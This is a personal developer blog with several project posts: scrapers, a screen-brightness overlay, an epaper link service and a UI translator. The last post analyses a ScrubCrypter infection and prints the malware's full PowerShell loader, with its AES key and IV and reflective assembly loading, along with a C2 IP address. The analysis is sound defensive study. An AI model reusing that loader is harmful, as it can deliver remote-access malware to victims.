Friday, October 4, 2024

Nepal Companies Scraper

A recent YouTube video led me to this site where we can obtain the details of any company registered in Nepal using its registration number. I found out that the number is enumerable i.e. you can enter any number in there and if one or more companies exist that correspond to the number, a few details such as the name of the company, established date, address, type and last contact date with the government office are shown. The fact that all of it wasn't available in bulk was a problem that I could tackle while getting to learn the latest in parallel programming in C# (it's been a while since I last wrote something in the language, or at least feels like it). So, a few days ago, I fired up Visual Studio and created a new console app targeting .NET 8 - the latest and greatest of the framework.

The first order of business was obviously to figure out the back-end API calls made by the webpage's interface upon clicking the Search button. Chrome devtools were as helpful here as always. I identified four different form parameters for the POST request's body and the cookie that was required to be set in the header. I made it work manually in Postman, then transitioned to code it up as simple as I could in C# - first using a simple for loop. I had to make it work sequentially before I could move on to multi-threading/concurrency. It did work really well. But of course, the speed wasn't all that great. Each POST request took around 130 ms, so if I were to check 1 million registration numbers, it would take 3 months. Obviously, I wanted to do it faster, and I knew there was something that the much acclaimed TPL (Task Parallel Library) of the .NET/Framework ecosystem could do here. I had used threads (extensively) before, and the threadpool's higher level methods for queuing up blocks of code to be executed by different threads as they become available. However, I had never had to dive into the depths of the TPL. Tasks were still relatively new to me. Sure, I knew how to use methods that returned them, await them and so on, but I hadn't ever felt a need to do Task-based (which I now know is _somewhat_ synonymous with asynchronous) programming. Most things I've done are CPU-heavy (if that) rather than extensively network/filesystem-oriented. So, it makes sense now with the luxury of hindsight, that I was able to coast through in my C# journey up to this point without having to learn much about handling repeated inherently I/O-bound operations that require the program to wait for response from an external source , such as performing HTTP requests. I mean I could probably put together something using just plain-old threads to perform somewhat close to the optimal that's achievable using the TPL (basically partition the full range, and synchronize the threads), but I wanted to learn this new thing. So, the first thing I tried was the humble yet powerful Parallel.For() loop. The only experience guiding me about this beast was that one time when I had written a prime number finder to compare the number-crunching speeds of C#, Java and C. This thing had wiped the floor back then. So, I was pretty confident that it would do great this time as well. Upon giving it a whirl, I found a few problems with it. First, there were an unacceptably large number of failed probes; it looked like the server was unable to serve however many threads it spun up. Second, it looked like my CPU was being utilized like crazy for what little it actually delivered. I now know that Parallel.For() doesn't do a great job of working optimally with asynchronous operations. At first glance, it seems reasonable that because HTTP requests fired in each iteration/thread are inherently blocking (and I did not write the request code in the idiomatic asynchronous style using await on every async method such as httpClient.GetAsync(), instead doing .Result and blocking the thread entirely - I did not know the difference!) of course it makes sense for another thread to start while the thread is blocked. However, I later learned that that is not the best way to maximize simultaneous requests. Just increasing the number of threads does not automatically mean better "throughput" (how many registration numbers got probed at a time) because - a) the server might not allow too many requests at the same time from the same IP, b) the threads are getting blocked for no good reason (this is with the .Result approach), taking precious CPU resources away from the availability of actually useful operations. Now I realize that both these drawbacks of the naive Parallel.For() loop approach could be mitigated by the use of encapsulated Tasks within the parallelized block of code and using locking mechanisms such as Semaphores, but it's a bit of a hack. While I have provided explanations on the cons of Parallel.For() with what I now know, back when I was actually testing it out, I did not bother getting into the weeds at all - I just knew that Parallel.For() wasn't working. Any internet search on "C# web scraping simultaneous requests" was yelling that Parallel.For() was for CPU-bound operations as opposed to I/O-bound operations such as network requests, which was better served with concurrent asynchronous programming, namely Task.WhenAll(). So, that's where I went next.

The approach with Task.WhenAll() is that you create an expression-tree using LINQ that when enumerated basically creates a Task for a specific registration number. It goes like: Enumerable.Range(1, 1_000_000).Select(async i => await YourHttpRequestMethodAsync(i);)

The above (pseudo)code basically maps each number from 1 to 1M to a separate asynchronous lambda expression that checks for companies corresponding to the given registration number (and does some side-effective thing updating a ConcurrentBag or whatever). The result is an IEnumerable of Task that can be run simultaneously using Task.WhenAll(). Of course it's possible to do it using a simple for loop instead, to generate a new Task for each invocation of YourHttpRequestMethodAsync(), but the above method appears to be more established because it doesn't end up actually creating all the Tasks at once - it only gives an IEnumerable, not a List or some other collection that requires holding them all in memory for no good reason most of the time - but that's a secondary point here. Okay, enough tangents! Now, this method worked great. The suggested way to limit concurrency here is to make use of a form of shared locks, specifically a Semaphore or SemaphoreSlim, before the actual invocation of the YourHttpRequestMethodAsync() method so that only a defined number of tasks run are active at any given time. Of note here is that a running Task is different from a running Thread, something I found intriguing (it's still something I'm not totally clear on even now). Even the same thread may be home to different tasks and a task may be run in different threads. It's all handled by the runtime, and as you can see, it's a higher level abstraction than threads. It is also what I suspect allows it to be so performant with little effort from the developer's standpoint (the runtime however, I'm sure, needs to do a lot more gymnastics here than when just using threads). I let my code run with this approach overnight and in about 6 hours or so, it had processed through all 1 million registration numbers and yielded just under 400k companies. By this point, I had also graduated from collecting all the harvested companies in memory and dumping them all once the whole process ended, to writing them in batches to a SQLite DB, for which I wrote another class called DBStore for handling the inputs from multiple threads, reporting metrics regarding its internal queue size, fill and drain rates, and to modulate efficiently the offloading rate from the queue and so on, but that's a whole another discussion - one that I'm omitting here since much of the code is self-documenting and the class is heavily commented. Suffice to say, this mini-project was mostly complete. However, Visual Studio's intellisense had shown me another Parallel.For-like method i.e. Parallel.ForAsync(). Given that I had seen discussions on the internet (mostly StackOverflow) regarding Parallel.ForEachAsync(), I was curious how well for ForAsync() would work. So, that's what I tried next.

Parallel.ForAsync() is a brand new method, only added to the language back in November of 2023. But I was targeting .NET 8 - the latest and the greatest, so I had no concerns. While Parallel.For() didn't natively understand the asynchronous programming model and so an asynchronous block of code given to it wouldn't be executed as one might expect unless a Task wrapping around the code was used as a workaround, ForAsync() was built for this purpose! You could plop in the same async i => await YourHttpRequestMethodAsync(i); asynchronous lambda without any change that you used for Task.WhenAll(), and it would work just fine! The upside was you didn't need to manually create Semaphore locks or bother with creating an enumerable of Tasks. You can simply control the "degree of parallelism" (note the level of abstraction in terminology, which I think is telling) using ParallelOptions and MaxDegreeOfParallelism (which is passed in as an argument to the method) and the runtime will do the rest. It's not all that different from Task.WhenAll() but it feels like it's the proper way to do something like this - it handles CPU-intensive works just as the regular Parallel.For() would, while giving first-class support to asynchronous operations such as network requests. Performance wise, comparing the two methods, I felt like I could push Parallel.ForAsync() more than I could Task.WhenAll() even when not placing any limit on concurrency using SemaphoreSlims; it seemed like Task.WhenAll() is pretty self-balancing and self-limiting and generally robust. Contrast this with Parallel.ForAsync()'s MaxDegreeOfParallelism, where it was obvious that it was much easier to overdo "parallelism" and get throttled right away. For the actual numbers (I ran a few simple tests for a period of 2 minutes using the two approaches), take a look at my repo.

There are more details in the readme file in my repo, such as the interesting problem of registration numbers and company mixups due to shared instances of HttpClient (with the same jsession cookie) being used in multiple threads at the same time, how the overall network speed plays a bigger role than the specific parallel programming technique used, and so on.

Here's the rough MDD I jotted down throughout this project:

naive parallel.for loop was implemented without allowing for server-side rate limits/timeouts. performance was poor. the same HttpClient instance with the same jsession cookie was utilised for all parallel iterations, so likely caused server-side session mixups leading to the wrong companies being reported for a requested regNum. also, lots of failed regNums (851744) for 154875 harvested companies at the end. ran overnight, about 12 hours for probing regNums 1 to 1 million. this was with MaxDegreeOfParallelism set to 4. had tested it out with many numbers including no limits. no limits mode basically led to instant request denials. higher numbers led to extremely low yields (harvested:tested ratio). so settled on 4. even then, unsatisfactory performance, as mentioned above.


in about 2 hours, harvested companies stabilised at 339489 using task.whenall(). stabilisation due to no company details being available for queried regNum. rate started out at around 1000 regNums processed (and an equal no. of harvested companies, with no failed regNums) per 10 seconds and slowly dropped to around 500 per 10 seconds prolly due to server-side throttling. failed regNums caused only due to server-side issues/throttling. for about 424k tested regNums, 700 failed regNums. very gradual rise in failed regNums. this approach applied the instantiation of a brand new HttpClient on every task to avoid potential server-side jsession mixups. this approach also has exponential back-off in case of timeouts and 3-times retry logic. processed 999815 regNums in 6 hours. as for the code, i noticed no difference between giving .Select() an async lambda or a normal sync lambda.


12648 harvested in 120 seconds using sqlite offloading (dynamic rate)


354862 harvested in 19785 seconds using sqlite offloading with simple sleep method. 519 failed regNums.


 Note: I stopped at 1 million because I wasn't getting any hits after around the 330k mark of harvested companies (which normally got reached at around the 2 hour mark using either of the two techniques - probing the whole 1 million took another 4 of course, just without many results).

Wednesday, July 31, 2024

ConstDisp

With dark themes nearly everywhere these days, I have been noticing that my eyes have a hard time whenever I see white/near-white renderings on my screen - whatever the specifics (webpages, native applications, videos, etc.). I wanted a program that would automatically adjust the brightness accordingly to fit a target brightness I specify. ConstDisp is the result. I first fiddled with a few WMI queries that actually change the screen brightness as one would do using say a keyboard combination (in laptops anyway, not sure if that works with most external monitors) but I ditched that idea because it didn't feel granular enough nor did it seem like it would work with all display hardware. This program works by cheating. All it does is create a topmost window whose background color we choose and whose opacity we modulate to achieve a user-specified target for the "average brightness" of the screen. That's mostly it. Of course, the way it calculates "average brightness" is arbitrary but it's good enough for me. This quantity is simply the mean of all red, green and blue channel values of the pixels of the screen. There could be other ways to get this metric but that's how it's done right now. I wanted to do something open source in C++, so I chose it; for the GUI, I used my SimWin library. In the process, I added a few more features that were needed for this project to SimWin as well. 

Creating the GUI for the program was not fun (really missed C#'s RAD) but implementing the core functionality was, and I got to learn a lot about the language.

Here's a screenshot:




Here's the repo and the binary.

Note: There's no app icon, so it appears as a generic executable. The language standard used here is C++14 but most modern windows should have no problem running the statically linked binary.

Wednesday, May 29, 2024

MCQ Scraper

This is a simple .NET 8 console application that scrapes MCQs from different online sources and consolidates them into a single SQLite DB. Check the schema of the table in the attached picture below.

Currently, it only collects Civil Engineering-related questions from IndiaBix for a select few categories, but this can be extended to other sources as well.

The program itself is pretty brittle in its current state - no allowance has been made for exceptions that I didn't encounter during development. Logging is a pretty basic custom implementation as well, and it was an after-thought (log file is constantly opened and written to every time a new line is to be logged, so be sure to disable it if you feel it hitting performance too much). Still, in the current form, the operation was completed in a matter of a couple minutes. 

Regarding dependencies, it uses simple Regex matching when possible and also HtmlAgilityPack for parsing the scraped HTML pages into manageable DOMs for easier filtering.

The resulting output DB file is available here.

Console output from the program in action


Top few entries from the output DB


UPDATE (31 May, 2024):
I've worked in a few improvements to the program and pushed the code changes to the repository. Now, it can also create Anki-flashcards so that the scraped content is actually useful. Also equally importantly, the program also has a bugfix/QoL enhancement so that the <img> tags are also checked for in the question texts/prompts as well - a possibility that I had ignored before - and the referenced images are downloaded, base64-encoded and replaced in place, ready for use in HTML as-is.

For the past day or two, I was wondering if I should create a separate app (I was thinking maybe a Vue-powered SPA) to actually make use of the DB; but a couple of hours' worth of internet research led me to believe that it would be a lot more efficient if this DB could be made available to Anki instead of reinventing the wheel all over again. Oh, and this apparently really popular app was first brought to my attention by ChatGPT-4o when I asked it "what is the best strategy to memorize around 4500 mcqs for a competitive exam?" Anki was literally the first option in the list it returned where it suggested to use it as a Spaced Repetition System (SRS) for "active learning". I had to download and play around with it for a bit before I could actually understand its workings. I also searched for any and all add-ons the Anki community had for Multiple Choice Questions and a tried one or two of them. But I didn't really like them too much - and I didn't know how I could export the questions from the DB to a form that these add-ons would understand either. So, taking the advice of a wise Reddit user somewhere, I just ditched the idea of using any sort of add-on altogether for MCQs and began exploring the import and export format used by Anki. It turned out that the program can import/export in a few different formats but I chose the simple plaintext format for obvious reasons and studied its structure. I created a new default deck - a term I have gathered means a collection of cards sharing some similarity; so in this case, a deck can represent a category - such as building-materials, or surveying, etc. Then I created two cards manually from inside Anki, each one following the pattern of the question prompt and the multiple options on the front side and the answer on the back side of the card. This is also where I learned that Anki has first-class support for HTML content in its flash-card contents, which was perfect for me since I didn't have to worry about all the tags in my scraped questions and options, not to mention the <img> tags. Anyway, then I exported the cards from Anki's File menu (still not sure if it exports just a single deck or all of them to the same file) to a plaintext file and studied the structure of the exported file. It was really intuitive, and I figured it would be easy enough to automate this process to convert the questions from my scraped DB to this format that Anki understood (I had also successfully tried externally modifying the export file and importing it back to Anki again, without any hiccup). So, that's what I did. I simply added a class library project to the Visual Studio solution and added in the functionality to get read-to-import Anki plaintext files from the SQLite DB produced by MCQer. And voila:

The *.txt files are the import-ready Anki plaintext files produced by our program

Confirming an import in Anki

Browsing the imported deck of cards (notice the images)

Another file, another deck of cards imported

A flashcard, when in action

Sunday, February 4, 2024

Gorkhapatra By Date

I used to visit the official Gorkhapatra epaper site and download the latest epaper to see if there were any PSC vacancies, up until a few months ago. I eventually stopped doing that, but until then, for about two years, everyday, I downloaded the daily epaper and uploaded it to DriveHQ. I had managed to exhaust two entire accounts' worth of storage with just Gorkhapatra pdf's. One thing I felt was lacking in the site was that the ability to download epapers older than 1 week, and the system was generally clunky and unreliable. So, this is why Gorkhapatra By Date was conceived.

Initially I had thought that I had to save the actual pdf's, because I wasn't sure the links would be valid past the 1-week-old mark but as I've learned in the past two weeks of developing this service, they are. So, I decided to just save the available links and do away with downloading the actual files.

Architecture-wise, the service is really simple. It's made up of two parts, one of which is just a CodeIgniter-based API server that retrieves the link to the epaper for the requested date, if present of course, from a table in the database. It also has another endpoint that simply lists the available dates. The links themselves are scraped from the original epaper site using a simple PHP script running as a cron job every 6 hours and the table is updated with any new link available. The script could technically be run just once a day typically a few tens of minutes past 12 AM (I've observed over the years that that's around the most likely time of upload of the day's paper to the site, though not always) but I've learned not to rely on this pattern.

The cron script doesn't just scrape the links and blindly insert them to the DB's table either. The original links present on the site are not direct links to the pdf's, however, the direct links are readily available with some simple URL string manipulation, so it does that as well. 

Also, since we need to be sure which date the pdf belongs to, we cannot just rely on the file name of the pdf (which is supposed to be a combination of the English and the Nepali dates of the day, but is very often wrong). As a solution, we actually download the contents of the pdf's and parse them (using smalot's pdf parser library for PHP) and obtain their metadata. Even after going through all this, the date specified in the metadata isn't always reliable. So, we perform a regex pattern matching on the first page of the pdf's after they've been parsed by the library. Only then do we have a reliable date for each file (unless the pattern of date printed in the pdf changes as well, in which case, we'll need to update our regex). 

The parsing itself turns out to be really CPU-intensive (the script finished parsing 8 pdf's comfortably within a minute on my local machine while it easily took 25-30 on my shared hosting server) but memory is where I hit a wall. Turns out, one of the pdf's was 22 pages and a simple memory_get_usage() function call logged into the script after the call to the parser revealed that the script was eating up ~170MB of memory for the file. My shared hosting config was set to 128MB for a script, so, as was expected, the script crashed upon reaching this particular pdf among the scraped list of 8: "Fatal Error: Allowed Memory Size of 134217728 Bytes Exhausted ...". Turns out, in a shared hosting environment, modifying the php.ini file isn't possible. Thankfully, the cPanel did have a page where I could change a bunch of different parameters for PHP, including memory_limit, which was initially set to 128MB that I promptly set to 512MB (the same as my development environment in XAMPP). Side note: I learnt after much back and forth with the hosting support that the change from cPanel modifies, to my utter befuddlement initially, not the php.ini file (which as they pointed out is global across the server, and is set to 128MB) but the httpd.conf file (which is separate for each user account on the server), which has precedence over the php.ini file. I learned that the memory limit set inside scripts have the highest precedence, then the httpd.conf file, only then followed by php.ini. I also learned about the php --ini and php --info commands and the phpinfo() function. The first one gives you info regarding where the php.ini file that the currently installed PHP binary is configured to use is located. The second one gives you info about the actual PHP configurations including memory_limit, and the third one is just the PHP function to do the same. Neat stuff.

Okay, once we have the date and the link for all available epapers we scraped (usually 8), we just insert them to the table and let MySQL handle the duplicates.

The front end is hosted on the main domain (ajashra.com) while the API server resides in a subdomain (api.ajashra.com), so the API server needs to allow CORS with the Access-Control-Allow-Origin header set to "https://ajashra.com". This was new for me and it took about half a day to fully iron out using the "before" filter feature in CodeIgniter4. Some cool stuff I learned there. The Same Origin Policy that necessitated this is only enforced by web browsers, so, while calling the API from front-end code from an origin other than the main domain will fail, the API still works for any non-web-browser consumer.

The JS library - "Vanilla Calendar" was used for the front-end to present an intuitive calendar interface where a user can see which dates are available for download. Clicking on any available date on the calendar directly leads to the corresponding epaper being downloaded.


Here's the URL for the service.

Wednesday, September 6, 2023

ScreenTranslator

 At work, I have to work with QQ, an Instant Messaging program and it's got an International version and a Chinese version. For the Chinese version of the app, I mostly have to rely on Google Lens to translate the UI to English.

So, about 3-4 days ago, I thought why not make a desktop program to do the translation instead of having to open Google Lens on my phone every time I want to make sense of a weird menu item in QQ's UI. So, this is my attempt at that. All it does is it iterates through the automation/accessibility elements in the app, gets English translations for each of the elements' texts and creates an overlay window with the translated text right over them. I first wanted to use Google's Translate API but that seems to require a credit card even for the free tier, so I settled for a free API that uses LibreTranslate. The translations are not as good as Google Translate but one can make out the meaning with some deliberation.

UI of the program

UI of the program during the translation process

QQ's menu before translation

QQ's menu after translation

The operation of the program is simple, middle click on any window to translate the texts in it. Move your cursor to the top left corner of your screen to remove all translation overlays.

The program doesn't work for entire webpages because webpages tend to have a lot of elements (in my case with multiple tabs open with one being a Chinese site, I counted over 10k elements) to process. The C# library I've used here for automation elements extraction simply doesn't care for a large number of elements and simply returns empty. It should work in scenarios dealing with a limited number of elements such as software programs with their UI in a foreign language.

Here's the GitHub repo and here's the release

Here's the MDD:

Musings During Development of ScreenTranslator:

------------------------------------------------


Don't ever create Forms on multiple threads. Use the main UI thread for all your window needs. You'll save a lot of headaches this way. I'd tried creating the translation overlays in separate threads for each new overlay but faced problems such as residual windows when the thread they were created in were aborted (meaning I would have to interact with the overlays to get rid of them), design problem regarding how to best close the overlay windows (abort the threads they were created in or make the overlay forms themselves listen to a flag?; do I create a new window using .Show() followed by Application.Run() or .ShowDialog()? and why? - at any rate, when the thread was aborted externally, the ThreadAbortedException would only be triggered inside each thread when the cursor was placed over them, not immediately), problem regarding some translations being randomly missed for whatever reason and so on. 

Just do whatever processing actually made you take the multi-threading route in different thread(s) and spare the UI/form creation logic to the main UI thread. this.Invoke() and this.BeginInvoke() are your friends. All of the problems that I described above went POOF when I did that. Countless StackOverflow posts don't recommend doing exactly this for no reason. If you're creating forms in separate threads, re-think your design. You will probably make it far simpler and solve most of your problems by leaving UI operations (that includes new form creation) to the main UI thread.


.NET's form's TopMost property is crap, like a lot of other things (Automation API comes to mind cuz it's also sth I've used in this project - or I should say, I've avoided in favor of the native automation API wrapper - CUIAutomation). Just use the native Win32 API: SetWindowPos() with the right params for it.


September 4, 2023 | 08:24 PM

-----------------------------

During automation tree iteration, you won't see what's not visible. I was trying to get all descendants of a web browser (firefox) to see if my tool worked to translate entire webpages but it didn't work. In the investigation, I found out that the CUIAutomation library was flat returning null for the FindAll() method when given the IUIAutomationElement returned from a call to ElementFromHwnd() (with the Hwnd obtained by the WindowFromPoint() API applied to the value returned by GetCursorPos()). To investigate what was happening, I opened Spy++ to see if I was getting the right hwnd and I found that the hwnd I had obtained from WindowFromPoint() was a child of a parent hwnd for firefox. I then got the parent hwnd for it and tried FindAll() with descendants as the treescope but I was still getting empty or null results. Then I thought to myself that the CUIAutomation library must be at fault here, after all, FindAll() with descendants is a very taxing operation, as suggested by MSDN. So, I made a fully functional program for the same in C++:

`

#include <iostream>

#include <Windows.h>

#include <UIAutomationClient.h>

#include <vector>


IUIAutomation* g_pAutomation;


void doItFaster();

std::vector<IUIAutomationElement*> GetDescendants(IUIAutomationElement* element);

std::vector<IUIAutomationElement*> GetChildren(IUIAutomationElement* parentElement);


int main()

{

std::cout << "Hello World!\n";

doItFaster();

}




void doItFaster() {

HRESULT _ = CoInitialize(NULL);

if (_ == S_OK || _ == S_FALSE) {

HRESULT hr = CoCreateInstance(__uuidof(CUIAutomation), NULL, CLSCTX_INPROC_SERVER, __uuidof(IUIAutomation), (void**)&g_pAutomation);


HWND hWndFirefox = (HWND)0x0006009E;

IUIAutomationElement* pBrowserElement;

if (g_pAutomation->ElementFromHandle((UIA_HWND)hWndFirefox, &pBrowserElement) == S_OK) {

IUIAutomationCondition* iUIAutomationCondition;

if (g_pAutomation->CreateTrueCondition(&iUIAutomationCondition) == S_OK) {


IUIAutomationTreeWalker* pAutomationTreeWalker;

if (g_pAutomation->get_ContentViewWalker(&pAutomationTreeWalker) == S_OK) {


auto leafElements = GetDescendants(pBrowserElement); // watch this


std::vector<std::wstring> leafElementNames;

for (auto leafElement : leafElements) {

BSTR name;

if (leafElement->get_CurrentName(&name) == S_OK && name != NULL) {

leafElementNames.push_back(std::wstring(name, SysStringLen(name))); // and this

}

}


int x = 0; // bp here


}



}


}


}

}


std::vector<IUIAutomationElement*> GetDescendants(IUIAutomationElement* element)

{

std::vector<IUIAutomationElement*> leafElements;


auto children = GetChildren(element);


if (children.size() == 0) { // this is a leaf element

leafElements.push_back(element);

}

else {

for (auto child : children)

{

auto descendants = GetDescendants(child);

leafElements.insert(leafElements.begin(), descendants.begin(), descendants.end());

}

}



return leafElements;


}


std::vector<IUIAutomationElement*> GetChildren(IUIAutomationElement* parentElement) {

std::vector<IUIAutomationElement*> retval;


IUIAutomationCondition* trueCondition;

g_pAutomation->CreateTrueCondition(&trueCondition);

IUIAutomationElementArray* children;

if (parentElement->FindAll(TreeScope_Children, trueCondition, &children) == S_OK) {

int numberOfChildren;

if (children->get_Length(&numberOfChildren) == S_OK) {

for (int i = 0; i < numberOfChildren; i++) {

IUIAutomationElement* child;

if (children->GetElement(i, &child) == S_OK) {

retval.push_back(child);

}

}

}

}


return retval;

}


`

It took me doing this that brought me to the realization that what was actually happening was that the web browser needed to be almost completely visible i.e. not blocked by any other window for the element extraction to work. My Visual Studio 2019 IDE was most definitely blocking the browser window when it was running.

ref: https://stackoverflow.com/questions/69122441/uiautomation-missing-to-catch-some-elements

There's no need to write my own custom FindAll descendants method like I did with recursion in the C++ version above. The built-in FindAll() with descendants treescope will work just fine. I only did what I did because I thought the stack was overflowing or something.

Also, the hwnd to be used for the parent element to do FindAll() is not what's available by WindowFromPoint(). You need to get the absolute parent window of the output of that API call to be sure. It might work for apps such as QQ (in my case, it worked perfectly fine with QQ but it clearly didn't, when I tried translating a Chinese website, which is what led to all of this) but doesn't work for all windows, especially web browsers.


September 5, 2023 | 03:39 PM

----------------------------

Turns out, FindAll() method provided by the IUIAutomation C# NuGet Package doesn't give results (i.e gives 0 length IUIAutomationElementArray) if there's a large number of elements. I tried parsing a firefox webpage browsing to csdn.com - a Chinese language site and the C++ code above (my own version of FindAll() for getting all descendants) took around 30s but returned over 10k elements. Did FindAll() with the treesccope of descendants in C# for the same hwnd/element and it immediately returned with a length of 0 (not null, but an IUIAutomationElementArray with length 0). Maybe porting the C++ version of GetDescendants() to C# by manually recursing through all immediate children would work for C# as well but I'm not going to do it. Just don't use it on websites.

For Brave browser with my outlook open on a tab, both the default FindAll() descendants in C# and the C++ version work just fine and there's around 370 elements.


September 6, 2023 | 11:50 AM

------------------------------

https://stackoverflow.com/questions/13225841/starting-application-on-start-up-using-the-wrong-path-to-load

When running on user logon (via HKCU Run entry), the working directory is not the application exe location. So, file paths that haven't been fully qualified don't work.

 

Thursday, July 13, 2023

ScrubCrypter malware analysis

 I was at my desk in office. Must have been around 12 or 12.30 PM, July 12, 2023. Suddenly, Windows Defender showed a “Threat found” alert. That immediately drew my attention. I checked to see which file it had detected and noticed it was a “udgbQ.vbs” file inside %appdata% that Defender had tagged. Of course, once I got to the folder, I saw Defender immediately remove from there. If I remember correctly, it was just a 1 KB file – I couldn’t get a look into its contents. However, I also saw two more files – “udgbQ.bat.exe” and “udgbQ.bat” :


(Read after finishing the article: Of note here is that at first, the exe file wasn’t visible even when the “Show hidden files” option in Windows Explorer was checked. But Process Hacker was reporting that such a process was already running and when asked to go to the file path of the process, it would take right to %appdata%, with no trace of the exe file – only the bat file could be seen. I then surmised from CurrPorts’ Process Attributes value of “AHS” that it must have set it to be an Archived Hidden System file. So I did an “attrib –s –h –a –r *.*” in the folder and the exe file finally showed. The attrib trick is from the good old days of virus hunting in Windows XP when I was in school – something that my Computer Science teacher had told us.)

I went into panic mode. I opened up the contents of the rather large bat file and it was a load of gibberish. I’ve included in this folder the same file as a .txt file (“udgbQ.bat.txt”) so that it’s not executed accidentally. Anyway, its content looks like the following:


Lines 2 through 7 and the final line 9 are legible. This batch script basically runs a powershell instance hidden and copies the legit powershell binary to its folder with its own name with an “.exe” appended, then it calls the copied powershell binary with a huge commandline argument (the call "%p%" %U:uLqiO=% line’s %U:uLqiO=% variable resolves into the correct argument because of the huge “set” command of line 8).

I tried figuring out what this mangled content would resolve into manually but I had also fired up Process Hacker by then and when I took a look at the commandline for the “udgbQ.bat.exe” process that was now running, it was already in plaintext:


First, I suspended the process after realizing it had already established a connection to the following:

Remote address: 51.77.167.52

Remote host name: ip52.ip-51-77-167.eu

Remote port: 6060

Local port: 63421

Protocol: TCP

(I made this observation using the Nirsoft program “CurrPorts”). I then looked into the commandline passed to this weirdly named powershell binary. The commandline was the following:

$oIou='InnJKbvonJKbknJKbenJKb'.Replace('nJKb', '');$AzqP='EnnJKbtrnJKbyPonJKbinJKbntnJKb'.Replace('nJKb', '');$LWEJ='ChnJKbannJKbgenJKbEnJKbxtenJKbnsnJKbionnJKb'.Replace('nJKb', '');$Jwxg='TranJKbnsnJKbfnJKbormnJKbFinnJKbanJKblBlnJKbocknJKb'.Replace('nJKb', '');$pWwA='LoadnJKb'.Replace('nJKb', '');$eDxq='CreanJKbtnJKbeDnJKbecnJKbrypnJKbtnJKbornJKb'.Replace('nJKb', '');$DtTM='MnJKbainJKbnnJKbMonJKbdnJKbulenJKb'.Replace('nJKb', '');$JZlt='SpnJKblinJKbtnJKb'.Replace('nJKb', '');$xzWC='GnJKbetCnJKburnJKbrnJKbennJKbtPnJKbrocnJKbesnJKbsnJKb'.Replace('nJKb', '');$aZrq='FnJKbronJKbmnJKbBnJKbasenJKb64nJKbStrnJKbingnJKb'.Replace('nJKb', '');$zerm='FirnJKbstnJKb'.Replace('nJKb', '');$euof='ReanJKbdnJKbLinJKbnnJKbesnJKb'.Replace('nJKb', '');function SHmms($fIyrX){$OXHzj=[System.Security.Cryptography.Aes]::Create();$OXHzj.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OXHzj.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OXHzj.Key=[System.Convert]::$aZrq('Ku4UyUqCrVKpr817sKewP+3V+wWyOhyCkaqfyyShZ9E=');$OXHzj.IV=[System.Convert]::$aZrq('6ttlhKwyOYtu8WT6FBC9HQ==');$RRNwL=$OXHzj.$eDxq();$jXMSp=$RRNwL.$Jwxg($fIyrX,0,$fIyrX.Length);$RRNwL.Dispose();$OXHzj.Dispose();$jXMSp;}function ODGMY($fIyrX){$nYjJX=New-Object System.IO.MemoryStream(,$fIyrX);$fmBrg=New-Object System.IO.MemoryStream;$lLnxw=New-Object System.IO.Compression.GZipStream($nYjJX,[IO.Compression.CompressionMode]::Decompress);$lLnxw.CopyTo($fmBrg);$lLnxw.Dispose();$nYjJX.Dispose();$fmBrg.Dispose();$fmBrg.ToArray();}$KawWa=[System.Linq.Enumerable]::$zerm([System.IO.File]::$euof([System.IO.Path]::$LWEJ([System.Diagnostics.Process]::$xzWC().$DtTM.FileName, $null)));$RIswh=$KawWa.Substring(3).$JZlt(':');$qTCRy=ODGMY (SHmms ([Convert]::$aZrq($RIswh[0])));$DWMcP=ODGMY (SHmms ([Convert]::$aZrq($RIswh[1])));[System.Reflection.Assembly]::$pWwA([byte[]]$DWMcP).$AzqP.$oIou($null,$null);[System.Reflection.Assembly]::$pWwA([byte[]]$qTCRy).$AzqP.$oIou($null,$null);

This was better than what was in the bat file but still not entirely obvious. I tried a bunch of things including manually cleaning up the .Replace() calls and separating out the semicolon-delimeted lines for better readability, tried CyberChef as well but finally settled on just pasting the whole thing into Visual Studio Code, saved it as a .ps1 file (powershell script) (after realizing it’s a powershell script) and formatted the file using VS Code’s PowerShell extension. It got a lot cleaner and looked a lot more like a normal powershell script. I didn’t want to do the .Replace() calls on my own, so I just added a breakpoint after all the .Replace() calls and simply hovered my cursor above the variables to get what they resolved to. Eventually, I manually replaced all the variables with their resolved string values as follows:


(Note that I’ve modified line 42 to use a valid path to the .exe file)

This script file has also been included in the same folder as this document.

I stepped through the code in VS Code, careful not to actually run whatever it is trying to run (I’ve commented out the final two lines of this file that actually Invoke the two payloads) and let VS Code and PowerShell do all the decrypting and what have you. I also added code to dump the payloads as .bin files

So, recapitulating the situation as a whole, the .bat file itself contains the compressed, encrypted and base64’ed version of the contents of the two payloads separated by a colon ‘:’ towards the beginning of the file and also contains the batch script that instructs powershell to get these two payloads and execute them. All of that information in just one file! That’s really cool.

Anyway, I managed to dump the first payload (decompressed ~1.2 MB) and Windows Defender and Avira (at this point, I’d already hurriedly installed the best free AV solution I know - Avira Antivirus) immediately picked it up. I disabled them for a moment and asked what VirusTotal thought of it:


Here’s the scan link.

Running Exe Info PE on the payload revealed that it’s a .NET assembly, and running .NET Reflector on it suggests that it’s a .NET assembly likely crypted with ScrubCrypter :



The actual RAT or stealer or whatever it is, is encrypted and is going to be decrypted and loaded at runtime by this .NET crypter.

It is obvious from Reflector that this assembly is obfuscated. So, I used de4dot to deobfuscate it:


Though it says Unknown obfuscation, it produces a deobfuscated assembly and loading it up with dnSpy reveals that the deobfuscation works:

The class names and the methods and the variables are legible.

Now, I just place a breakpoint at line 31 (guessing the previous line returns the decrypted payload to a byte array) and just right click on the “rawAssembly” local variable and click Save and voila, I have the original payload. It is about 3.2 MB in size and Detect It Easy says the payload is a .NET Framework 4 executable as well:


VirusTotal is fairly certain that it is QuasarRAT:


Now, moving on to the next payload in the bat file (obtained by dumping the byte array inside the function call @ line 45 of the powershell script). This payload appears to be smaller – only about 15 KB. Virustotal says it’s a Trojan named “Barys”:


I load it in dnSpy and see mangled names here as well, similar to the first payload, so I use de4dot on it to deobfuscate/clean it as far as possible(though it says the obfuscator is unknown here as well):


Here’s the payload loaded in dnSpy, both the original version and the cleaned version:


The names are readable at least, though the strings are all gibberish and a lot of Win32 API calls appear to have been made dynamically. Lots of Marshal.GetDelegateForFunctionPointer() calls as well. The names of the API calls aren’t visible either:



Looks like it’s obtaining the address of API function addresses from its process and resolving them to their corresponding function delegates. These delegates and their parameters look familiar – CloseHandle(), VirtualProtect(), CreateFile(), CreateFileMapping(), CopyMemory(), IsWow64Process() etc.

